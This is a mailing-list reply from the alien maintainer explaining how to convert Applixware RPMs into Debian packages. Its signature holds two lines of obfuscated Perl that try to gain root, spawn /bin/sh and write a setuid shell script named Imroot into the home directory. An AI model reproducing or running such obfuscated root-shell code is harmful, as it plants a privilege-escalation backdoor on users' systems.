Re: applixware

Richard Sevenich:
> The recent Linux Journal review of Applixware makes that office suite sound
> very attractive. It is, however, packaged for RedHat. Has someone on our list
> had successful experience installing it via alien or whatever method? If so
> I'd like to hear how smoothly the installation went.

Yes, I own a copy of applix. I also happen to maintain alien. Alien can
easily convert the rpm's that come on the applix CD into debian packages. I
took it an extra step and added a special patch file to applix for alien,
which should let it convert applix using less disk space and move the applix
stuff out of /opt (since debian doesn't use /opt yet and most people don't
have hundreds of MB free on their root partition.)

Anyhow, let me know if you have any problems with it. It should be as simple
as "alien applix.rpm".

--
#!/usr/bin/perl -i$>=0;$<=0;exec"/bin/sh"'>achmod             joey@kite.ml.org
$_="echo '#!/usr/bin/suidperl -U\n$^I 2755aa";s=a= $ENV{HOME}/Imroot;=g;exec$_